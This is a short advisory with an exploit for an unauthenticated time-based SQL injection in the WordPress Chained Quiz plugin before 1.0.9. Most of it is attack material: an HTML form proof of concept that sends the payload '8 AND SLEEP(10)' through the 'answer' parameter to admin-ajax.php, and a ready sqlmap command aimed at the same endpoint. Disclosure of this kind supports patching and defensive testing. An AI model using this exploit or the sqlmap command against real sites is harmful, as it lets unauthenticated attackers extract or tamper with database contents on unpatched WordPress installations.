WordPress Plugin Plugin Chained Quiz before 1.0.9 allows remote unauthenticated users to execute arbitrary SQL commands via the βanswerβ and βanswersβ parameters. Technical details: Chained Quiz appears to be vulnerable to time-based SQL-Injection. The issue lies on the β$answerβ backend variable. Privileges required: None
The following exploit will cause the SQL query to execute and sleep for 10 seconds:
<html>
<body>
<form action="http://target/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="answer" value="8 AND SLEEP(10)" />
<input type="hidden" name="question_id" value="194" />
<input type="hidden" name="quiz_id" value="581" />
<input type="hidden" name="post_id" value="3199" />
<input type="hidden" name="question_type" value="radio" />
<input type="hidden" name="points" value="0" />
<input type="hidden" name="action" value="chainedquiz_ajax" />
<input type="hidden" name="chainedquiz_action" value="answer" />
<input type="hidden" name="total_questions" value="2" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Using SQLMAP:
sqlmap -u "http://target/wp-admin/admin-ajax.php" --data="answer=1*&question_id=1&quiz_id=1&post_id=5&question_type=radio&points=0&action=chainedquiz_ajax&chainedquiz_action=answer&total_questions=1" --dbms=MySQL --technique T